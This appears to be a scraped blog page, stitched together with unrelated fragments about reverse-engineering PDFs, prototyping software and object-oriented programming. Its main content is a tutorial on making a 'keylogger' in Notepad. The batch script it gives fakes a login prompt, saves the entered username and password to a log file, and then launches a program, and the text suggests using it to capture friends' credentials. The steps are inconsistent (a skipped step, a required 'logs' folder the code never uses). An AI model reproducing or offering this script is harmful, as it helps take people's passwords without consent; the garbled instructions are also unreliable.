reverse engineering for beginners in PDF
Love this prototyping software …brilliant!
The method is very simple and easy and you don’t need any tool to this just a notepad and a little code given below is enough for this. So just follow the post below to proceed.
Creating Keylogger With Notepad:
1. First of all you need to open notepad in your windows by pressing Window button and then entering notepad.
2. Now in notepad copy and paste the below code in it.
echo Please Enter Your Email Address And Password
set /p user=Username:
set /p pass=Password:
echo Username=”%user%” Password=”%pass%” >> Log.txt
start >>Program Here<<
4. Now create a new folder named logs. (Note that keylogger will only work if the folder name is logs).
5. Cut this folder and paste it into drive C: .
So above is all about How To Create a Keylogger Using Notepad. With this method you can easily record out the keystrokes of your keyboard that had been entered in the batch file. And you also use it to shocks your friends by telling them their user name and password with this. Hope you like the post, don’t forget to share and leave a comment below if you have any related query.
• Classes and Objects • Abstraction and Encapsulation • Inheritance • Reusability • Polymorphism Features of Object Oriented Programming : Java effect Classes in…